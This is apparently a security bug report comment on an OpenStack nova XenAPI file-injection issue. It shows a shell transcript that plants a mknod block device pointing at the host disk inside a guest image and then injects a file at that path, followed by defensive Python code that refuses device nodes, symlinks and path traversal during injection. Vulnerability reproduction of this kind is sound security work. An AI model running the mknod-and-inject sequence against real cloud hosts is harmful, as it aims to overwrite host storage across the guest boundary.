After an attempted repro, I'm not convinced that XenAPI is vulnerable:

stack@DevStackOSDomU:~$ grep flat_injected /etc/nova/nova.conf
flat_injected = True
stack@DevStackOSDomU:~$ lsblk | grep xvdb
xvdb 202:16 0 1G 0 disk
stack@DevStackOSDomU:~$ nova boot --image cirros-0.3.4-x86_64-disk --flavor 1 NodevFix
stack@DevStackOSDomU:~$ nova list | grep NodevFix
| 23db106a-321d-4033-8368-cc6d91d3d307 | NodevFix | ACTIVE | - | Running | private=10.0.0.2 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo mknod /host-device b 202 16
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo sync
stack@DevStackOSDomU:~$ nova image-create 23db106a-321d-4033-8368-cc6d91d3d307 ImageWithDev
stack@DevStackOSDomU:~$ echo "Before running an instance" | sudo tee /dev/xvdb
stack@DevStackOSDomU:~$ echo "After running an instance" > test-file
stack@DevStackOSDomU:~$ nova boot --file /host-device=test-file --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_exploit
stack@DevStackOSDomU:~$ strings /dev/xvdb
Before running an instance
stack@DevStackOSDomU:~$ nova list | grep NodevFix_exploit
| ba73ef12-a60a-4e91-b4a0-3046db5131ba | NodevFix_exploit | ACTIVE | - | Running | private=10.0.0.6 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo cat /host-device
After running an instance
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo ls -altr /host-device
-r--r----- 1 root root 26 May 31 15:13 /host-device

And just to check what happened without the file injection:

stack@DevStackOSDomU:~$ nova boot --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_NoInject
stack@DevStackOSDomU:~$ nova list | grep NodevFix_NoInject
| fc3f1a45-6048-4abf-82a5-5b9b352c59fe | NodevFix_NoInject | ACTIVE | - | Running | private=10.0.0.8 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.8 sudo ls -altr /host-device
brw------- 1 root root 202, 16 May 31 15:06 /host-device

As such, it *looks* like the way XenAPI uses vfs will replace the mknod device with the requested file?
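The behaviour the transcript above hopes for (the injected file replaces the planted device node instead of being written through it to the host's /dev/xvdb) is what a file-injection routine has to enforce explicitly. The following is an added example of that check, written here for illustration; it is not nova's or the XenAPI driver's own injection code. It assumes the guest image is already mounted at a directory given as `root`, and it uses a FIFO and a symlink as stand-ins for the mknod'd block device, since creating a real block node needs CAP_MKNOD. The helper names (`inject_file`, `demo`) and the sample file contents are mine.

```python
import os
import stat
import tempfile

# Illustrative code, not nova's injection routine. Assumed layout: the guest
# filesystem is mounted at `root`; `guest_path` is the absolute path inside it.


def _safe_target(root, guest_path):
    """Map a guest-absolute path onto the mounted root, refusing '..' and any
    symlink or non-directory among the parent components (a symlinked parent
    could point back at the host's /dev or anywhere outside the guest tree)."""
    parts = [p for p in guest_path.split("/") if p not in ("", ".")]
    if not parts or any(p == ".." for p in parts):
        raise ValueError("refusing guest path %r" % guest_path)
    cur = root
    for p in parts[:-1]:
        cur = os.path.join(cur, p)
        st = os.lstat(cur)  # FileNotFoundError if the parent is missing
        if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
            raise ValueError("unsafe parent component %r" % cur)
    return os.path.join(cur, parts[-1])


def inject_file(root, guest_path, data, mode=0o440):
    """Write `data` to `guest_path` inside `root` without ever open()ing an
    existing node there. Returns the filemode letter of the node that was
    replaced ('b', 'c', 'p', 's', 'l') or None if a regular file was written
    over / created fresh."""
    target = _safe_target(root, guest_path)
    replaced = None
    try:
        st = os.lstat(target)
    except FileNotFoundError:
        st = None
    if st is not None:
        if stat.S_ISDIR(st.st_mode):
            raise ValueError("%r is a directory" % guest_path)
        if not stat.S_ISREG(st.st_mode):
            # Device node, FIFO, socket or symlink: a plain open()+write would
            # go to whatever it designates (the host block device in the bug
            # report). Unlink it so the new file is created in its place.
            replaced = stat.filemode(st.st_mode)[0]
        os.unlink(target)
    # O_EXCL guarantees we created the inode ourselves; O_NOFOLLOW guards the
    # window between unlink and create against a re-planted symlink.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, mode)
    try:
        os.fchmod(fd, mode)  # apply the requested mode regardless of umask
        os.write(fd, data)
    finally:
        os.close(fd)
    return replaced


def demo():
    """Constructed scenario mirroring the transcript: a planted node at
    /host-device, a file standing in for the host's /dev/xvdb, and a symlink
    escape. Returns what happened so a caller can check it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "guest")
        os.mkdir(root)
        host_dev = os.path.join(tmp, "host-block-device")  # stands in for /dev/xvdb
        with open(host_dev, "w") as f:
            f.write("Before running an instance\n")
        os.mkfifo(os.path.join(root, "host-device"))  # stands in for mknod b 202 16
        os.symlink(host_dev, os.path.join(root, "escape"))

        payload = b"After running an instance\n"
        replaced_node = inject_file(root, "/host-device", payload)
        replaced_link = inject_file(root, "/escape", payload)
        try:
            inject_file(root, "/../host-block-device", payload)
            traversal_blocked = False
        except ValueError:
            traversal_blocked = True

        with open(host_dev) as f:
            host_contents = f.read()
        with open(os.path.join(root, "host-device"), "rb") as f:
            guest_contents = f.read()
        st = os.lstat(os.path.join(root, "host-device"))
        return {
            "replaced_node_type": replaced_node,  # 'p': the FIFO was replaced
            "replaced_link_type": replaced_link,  # 'l': symlink replaced, not followed
            "host_untouched": host_contents == "Before running an instance\n",
            "guest_file": guest_contents,
            "guest_mode": stat.S_IMODE(st.st_mode),
            "is_regular": stat.S_ISREG(st.st_mode),
            "traversal_blocked": traversal_blocked,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```

The important part is the `lstat` before any `open`: a routine that simply does `open(path, "w")` on the mounted image would follow the block node (or a symlink) and write the "injected" bytes onto the host device, which is exactly what the `strings /dev/xvdb` step in the transcript is checking for.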